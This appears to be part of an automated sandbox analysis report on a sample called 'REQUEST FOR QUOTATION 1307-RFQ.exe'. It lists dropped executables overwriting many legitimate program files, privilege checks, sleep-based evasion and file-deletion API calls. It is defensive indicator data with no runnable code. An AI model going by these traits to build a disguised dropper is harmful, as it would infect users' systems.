              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeDropped PE file which has not been started: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\Spectrum.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeAPI coverage: 5.0 %
              Source: C:\Windows\SysWOW64\perfhost.exeAPI coverage: 0.0 %
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7432Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\System32\msdtc.exe TID: 7828Thread sleep count: 494 > 30Jump to behavior
              Source: C:\Windows\System32\msdtc.exe TID: 7828Thread sleep time: -49400s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920Thread sleep count: 7345 > 30
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920Thread sleep time: -73450000s >= -30000s
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920Thread sleep count: 2653 > 30
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920Thread sleep time: -26530000s >= -30000s
              Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598841Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598514Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597858Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597749Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597569Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597268Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597148Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
